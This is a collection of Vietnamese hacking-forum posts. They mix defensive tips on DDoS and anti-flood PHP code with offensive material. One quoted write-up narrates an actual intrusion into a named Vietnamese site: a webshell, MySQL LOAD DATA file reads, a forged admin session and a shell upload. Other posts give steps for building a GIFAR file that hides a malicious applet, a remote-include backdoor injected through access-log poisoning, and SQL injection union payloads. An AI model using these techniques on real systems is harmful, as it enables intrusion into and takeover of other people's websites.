|
|
cái này thấy quen quen Google search " Key loger " nhé bạn
- Chúc may mắn.
|
|
|
Dreamwear có chức nắng " search content all file in folder ", bạn search từ "ssh101.com" cho toàn bộ source của bạn xem sao
|
|
|
vBB có chức năng " Xác minh con người " mà bạn.
Bạn vào Admincp --> Settings ---> Quản lý xác minh con người.
Bạn có thể add 1 số câu hỏi hoặc ký tự ngẫu nhiên để bắt người dùng trả lời hay nhập vào.
Còn cái list nick của bạn là do 1 ctrinh` auto create nick để quảng cáo.
- Thân.
|
|
|
kill process của nó đi. Xem path nó ở đâu rồi xóa đi, thế là ổn
|
|
|
lúc thì ip này lúc thì ip kia không chặn hết được không biết có phần mềm nào tự band ip khi request quá nhiều không nhỉ
Bạn có thể dùng Mod_Security của apache và Iptables của Linux Kernel.
Còn với mớ log trên kia, rất có khả năng bạn bị xFlash DDoS. Nó send nhìu request dạng POST khống đến site của bạn, vì là post khống nên đều bị trả về 404 ( not found ) nhưng Server vẫn phải sử lý -> theo time và số lượng Serv của bạn bị ùn tắt
Good luck !
|
|
|
myquartz wrote:
Hi!
Thấy vài member thảo luận về code chống DOS. Tớ góp 1 tí cho vui.
Đây là đoạn code tớ đã áp dụng 1 cho 1 site của tớ, nó có khoảng 5000 keep-alive session, 10K IP khác nhau truy cập hàng ngày, site cung cấp thông tin trực tuyến nên mỗi client request khoảng 5-7 giây 1 lần, với 18-20 triệu hit/ngày (cường độ khá kinh khủng đấy).
code này áp dụng cho php. Phải kết hợp với memcache để đảm bảo tốc độ (1 ứng dụng khá là ... hay đấy). Nếu dùng mysql cũng đc, với memory table, nhưng ko hay lắm vì mysql nhiều overhead hơn nên chậm hơn.
Code:
$antiflood = 4; // anti-flooding protect time in seconds.
[b][color=yellow]$MCobj = new Memcache;[/color][/b]
if(!$MCobj->pconnect($MCHost, 11211))
$MCHost = null;
else if($debug) echo "<debug>Connected to cached</debug>";
//Anti flooding
$pattern = '/^(10\.|192\.168\.|127\.)/';
if($MCobj && !preg_match($pattern,$_SERVER['REMOTE_ADDR'])) {
$protectedkey = 'ip'.$_SERVER['REMOTE_ADDR'].'-'.$_SERVER['SCRIPT_FILENAME'];
$isquery = $MCobj->get($protectedkey);
if($isquery) { // query too fast
echo 'Server too busy, please visit later.;
exit();
}
$MCobj->set($protectedkey, 1, 0, $antiflood);
}
Chúc các bạn thành công.
Mình vẫn chưa thấy Class Memcache... ? Bạn giải thick rõ hơn về đoạn code trên được ko ? Vd như Memcache được gọi ra từ đâu ?
|
|
|
khovingu89 wrote:
lên google tìm kiến thức botnet đấy từ căn bản đến nâng cao và sem mấy video họ hướng dẫn điểu khiển botnet
Lại 1 lần nữa mình lại nhắc bạn, trước tiên nên tốt về chính tả rồi sau đó học lập trình rồi mới vào phát bỉu Nhé bạn
|
|
|
khovingu89 wrote:
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin
Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu !
Chân thành đấy
|
|
|
http://code.google.com/p/doctype/wiki/ArticlesXSS
|
|
|
đã nghĩ đến việc mở port rồi thì phải nghĩ tiếp đến việc làm sao connect vào, khi connect vào rồi thì phải nghĩ xem mình cần những thông tin gì về máy victim ! Còn nếu ko có mục đích gì thì ngừng lại
|
|
|
Đã gọi là " Phiên làm việc ", thì hết phiên này sẽ đến phiên khác ! Sau khi phiên làm việc này hết hiệu lực thì session đó ko còn giá trị nữa ! Nên bởi vậy hầu hết bây giờ ko cần phải quản lý session ! Vì session chỉ có thời hạn trong thời gian ngắn chứ không như cookie !
Chỉ cần viết kỹ code là được :d Tham khảo về Session Fixation trên wikimedia
|
|
|
em vẫn chưa hiểu rõ lắm về ý của anh hackerbinhphuoc, có phải ý anh là nếu set session.use_only_cookies=0 thì có thể thực hiện tấn công thế này :
Mình login vào thì webserv sẽ tạo cho mình 1 sessionID, sau đó mình coppy link sessionID của mình rồi send cho admin ( đã login ), nếu admin click vào thì dính chưởng ?
Em có 1 site, em là Admin, vậy anh gửi cho em cái link session của anh rồi để em click vào thử xem anh có thành admin ko nhé
bạn phstiger tham khảo bài viết này thử nhé :
Tóm tắt quá trình hack athena.com.vn
(Local attack)
Bỏ qua mấy giai đoạn lặt vặt bây giờ làm việc với trường hợp đã có sẵn con webshell //http://12a6dh.info/forum/cache/skin_cache/cacheid_2/skin_public.php
Chạy con backdoor trên kết nối vào mysql của 12a6 sau đó tiến hành lấy sources của athena. Trong trường hợp này xác định link của trang quản trị là /admin nên chỉ chú trọng vào việc lấy code của các file liên quan đến cái này thui (khi nào có con backdoor trên host của nó rùi lấy tiếp). Lấy code bằng mấy câu query sau:
CREATE TABLE test(text LONGTEXT);
load data local infile 'path/file' into table test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n';
Có code rùi thì ngồi đọc nó, trước hết là thằng index.php
session_start(); // quản lý bằng session chứ ko phải bằng cookie, có nghĩa là khi ta vào link admin nó sẽ tạo cho ta một phiên làm việc, phiên làm việc này sẽ được server tạo ra và lưu vào file sess_...... (VD: sess_2d193503319fefd5a48b208d48b69d36) nằm trên server, mặc định của phiên làm việc này là ko hợp lệ nhưng nếu ta đăng nhập thành công thì server sẽ chỉnh sửa file sess_ kia thành hợp lệ (hack được athena phải cảm ơn thằng này nhiều ). Tiếp tục nào case 'login' : include "_login.php"; break; thằng index sơ sơ như vậy là được rùi bây giờ chuyển sang thằng _login.php
if (isset($_POST['txtUsername'])) $admin_user=$_POST['txtUsername']; else $admin_user='';
if (isset($_POST['txtPassword'])) $admin_pass=$_POST['txtPassword']; else $admin_pass='';
if (isset($_POST['txtPassSec'])) $admin_sec=$_POST['txtPassSec']; else $admin_sec='';
hô hô user, pass1, pass2.
$admin_sec = md5(base64_encode($admin_sec));
if ($admin_sec == "53f8797e875fb1b667c86e4ae15cee24") {
if ( (!empty($admin_user)) && (!empty($admin_pass)) )
{
$admin_pass = md5($admin_pass);
$query = "select * from admin WHERE username='$admin_user' AND password='$admin_pass'";
ặc ặc cái pass2 của nó vừa base64_encode vừa md5, nó mà đặt pass dài xíu là ngồi decode đù người luôn mà chưa chắc gì có kết quả, còn cái pass1 cũng bị md5 luôn.
Có 2 cách giải quyết được đặt ra, thứ nhất là dò 2 cái pass của nó, thứ 2 là fake cookie. Cách thứ nhất ko chơi, ngu gì mà ngồi dò pass trong khi cách thứ 2 có vẻ dễ ăn hơn và khả năng thành công cũng cao hơn. Hồi nãy coi file index thấy nó quản lý phiên làm việc bằng session coi bộ ngon ăn. Vậy là quyết định chọn cách 2.
Có 2 hướng giải quyết cho cách 2:
+ Thứ nhất là khi ta mở trang index.php ra nó sẽ tạo cho ta một session trên server, công việc của ta là tìm cách edit cái phiên làm việc sao cho nó trở thành hợp lệ. Coi cái phpinfo() của nó xem nào session.save_path=/tmp. Ok rùi mở cái thư mục /tmp coi thử có gì trong đó. Ặc ặc …. bị access denied rùi coi bộ hướng đi này ko ổn, chuyển hướng đi thui.
+ Thứ hai nếu ta edit cái file session ko được thì tại sao ta ko tạo ra một cái file session mới hợp lệ với cái source đã có kia rùi fake cookie của web browser với cái session mới đó. Vậy là đã xác định được chính xác hướng đi và những cái cần phải làm, công việc tiếp theo là up sources của athena lên host 12a6, edit lại cái pass2 trong file _login.php, edit cái pass1 trong db của nó, xong rùi login nào … vừng ơi mở ra…. bùm vào được admin control panel rùi (cái này là đồ giả nằm trên host của 12a6) vào phần quản lý cookie của web browsers (opera) coi thử cái session của nó là gì nào, copy nó lại bây giờ chuyển qua thằng athena fake bằng cái session đó, refresh lại nào …. bùm …. he he heeeeee vào được admin control panel của athena rùi (hàng thật chất lượng cao ), tìm chỗ up con shell…..
GAME OVER
Author: longnhi(HCE)
|
|
|
Ủa, làm sao bạn biết IP đó ?
Mình giấu IP rồi mà ?
Chắc nhìn vào cái OS và số đầu của IP nên đoán ra thôi! ko có gì lạ cả !
Bạn xem kĩ lại các log HTTP REQUEST xem có dấu bị của Sql injection ko ?
Rồi xem lại logs FTP xem, có dấu hiệu bị lộ pass ko ?
Nếu sài Sharehosting nên tình trạng bị Local attack cũng rất nhiều ! set permiss của các folder cho kĩ lại, rồi check lại source xem có dấu hiệu của sql injection ko ! Nhất là mấy cái Input
Good luck !
|
|
|
post.asp?id=334334' <--- tui ví dụ để tượng trưng thôi, có thể thay = bất cứ tham số nào ko có giá trị trong DB ( để nó select ra ) đều được ! vd như ?id=-3 ! Miễn sao tham số đó ko có giá trị trong DB, để còn chừa chỗ cho kết quả mà mình đã inject hiện ra !
|
|
|
post.asp?id=334334'
nhớ phải có giá trị cho id, và inject sql command vào column 11 thử xem
|
|
|
mrro wrote:
@flier_vn: khổ bạn quá, gì mà từa lưa hết, chỗ này xọ chỗ kia. ngồi xem lại xem java applet là cái chi rồi hẵng coi cái GIFAR này là cái chi, kẻo bị tẩu hỏa nhập ma thì chẳng có ai cứu được đâu.
--m
Ừhm ! Em xin lỗi, em sẽ rút kinh nghiệm, lần sau khi tham gia chủ đề nào đó thì em phải chắc chắn rằng em am hiểu 1 chút kiến thức về chủ đề đó thì mới dám mở miệng tham gia Thx anh rất nhiều.. !
àh ! Riêng về cái này thì thx anh nbthanh đã giúp em hiểu phần nào rồi
Còn đây em xin post cách tạo file GIFAR.gif ( cũng như tương tự ) dành cho những bạn chưa biết :
1. Xoạn thảo 1 file java chứa mã độc rồi complie lại :
$ : javac exp1.java
rồi :
$: jar -cf exp1.jar exp1.class => tạo file .JAR
Tiếp :
$ : cat xxx.gif exp1.jar > gifar.gif
Okies! Thành công
To mrror : Nhưng.... cái lối nói chuyện của anh thì hok bik sau này anh dạy con, dạy cháu anh sao nữa, thậm chí bây giờ nếu đoán ko lầm chắc bạn bè anh chỉ đếm đầu ngón tay ! hahaha ! Muốn chỉ bảo ai thì cũng phải làm cho người đó phục trước đã ! Từng lời lẽ phát ra phải làm cho người ta "mến" và phục, như reply như anh nbt_thanh thì làm gì có ai dám mở miệng nào tiếng nào ! hahaha ! Hok biết mỗi lần bro phát ngôn ra là lại có người chỉ chữi, mặc dù cũng có rất nhiều anh cũng hay châm chọt, nhưng châm chọt của họ là để giúp cho mình tiến bộ nên mọi người cũng rất hài lòng ! Bro mới là người coi chứng bị tẫu quả nhập ma, riết hok có ai chơi với mình thì bị tẫu quả thiệt đó ! haha !
to all : có gì sai thì move wa box tán gẫu, vì ko có lý do gì để cho vào thùng rác
|
|
|
àh :d Vậy đã hiểu
Nếu vậy thì chỉ cần upload file GIFAR.gif lên webserver victim rồi tự tạo 1 form trên máy mình rồi cho load... vậy có nghĩa là applet đã thực thi trên webserver ! Nhưng theo em biết thì nó lại ko tác động được đến HDD... vậy chỉ có thể dừng lại ở bước lấy các thông tin browser thôi àh ??
|
|
|
Cho em hõi xí về GIFAR này :
Khi đã tích hợp 2 file thành công, thì khi duyệt file GIFAR.gif thì applet java có được thực thi ko ? hay phải nhờ đến tag html <applet code="xxx.class" archive="GIFAR.gif"> ?
Và lỗi này chỉ thực thi được ở phía client ( và client phải có cài đặt java ) chứ ko tác động được đến webserver ?
Đây là sự kết hợp hoàn hảo với lỗi XSS ?
Thx trước ạh
|
|
|
Em có trường hợp này, mong a e góp ý hướng đi !
Em đã có được password của các user mysql ! Nhưng dạng "localhost@user" vậy ngoài việc mò trùng pass với các thứ khác ra thì còn có hướng nào nữa ko ???
bài viết http://milw0rm.com/papers/225 vẫn chưa có gì mới lạ !
Thx !
|
|
|
gamma95 wrote:
thực ra đề bài QVT cho là thừa dữ kiện, và cái
?html=/home/hostings/webs/victim.net/logs/access_log
của đống chí gsmth
có cách nào đơn giản hơn ko ??
và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko??
Có cách nào đơn giản hơn thì em hem bik
và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko??
Còn cái này thì em nghĩ là : <? include ('http://link/backdoor.php'); /* ?> or ? include ('$xxx'); /* ?> ! ít nhất thì cũng hay hơn bọn tây kia inject
==> ?html=/home/hostings/webs/victim.net/logs/access_log?xxx=[link] <--- loại được các cái thừa ko cần đến mà log ghi lại !
|
|
|
view all MAC Address của network ! Xem có MAC nào lạ lạ là bụp liền...
|
|
|
lấy những thứ mình cần rồi vứt nó đi ! hahah !
|
|
|
bạn muốn đưa IP nào vào HTTP Header ? IP máy của bạn hay IP do bạn định trước ?
Hõi rõ xí nữa đi bạn
|
|
|
uhm.. Kiểu như SQL Injection by pass vậy !
fix lỗi trên, theo mình nghĩ đơn giãn... :
Code:
$db->setQuery("SELECT id FROM #__users WHERE block = 0 AND activation =".$db->Quote($token)."'");
là đủ rùi ! Mà nếu là sql injection thì sao ko thử :
SELECT id FROM jos_users WHERE block = 0 AND activation = '' union select xxx from jos_uers where activation=''
liệu có được ko nhĩ ?
|
|
|
Về phần HTTP REFERER thì OK rồi
Thx !
|
|
|
cho mình hõi có cách nào để lấy trọn bộ của HTTP HEADER + REFERER của người truy cập bằng PHP ko ?
mọi người help mình nhé thx
|
|
|
Hỏi :
Hôm nọ em có gặp 1 trường hợp 1 site bị sql injection sử dụng MS Access !
1. Ngoài cách ngồi đoán table thì còn cách nào nữa ko ? Có thể dùng Blind ko ?
2. Khi đã biết được vaid table, muốn select giá trị trong column ra thì có buộc phải dùng cách đếm số column ( vd như : union select null,vaidcolumn,null,...n from vaidtab where column=n%00 ) hay có thể select trực tiếp ra như MS SQL ( union select column from table where column=n%00 ) ? Cả 2 cái này em đều test ko được Ai cho em thử 1 ví dụ được ko ạ ?
Àh ! hôm nọ thử dùng xp_dirtree để list dir ra ( site sử dụng MSSQL, em thử insert xp_dirtree vào 1 tab sau đó select ra ) nhưng ko thành công trong khi user là SA !
Hỏi :
1. Chỉ có SA hoặc user nào có quyền tương tự mới mới có thể dùng xp_dirtree àh ?
Mong mọi người help để em bik thêm tí nữa :d Thx
|
|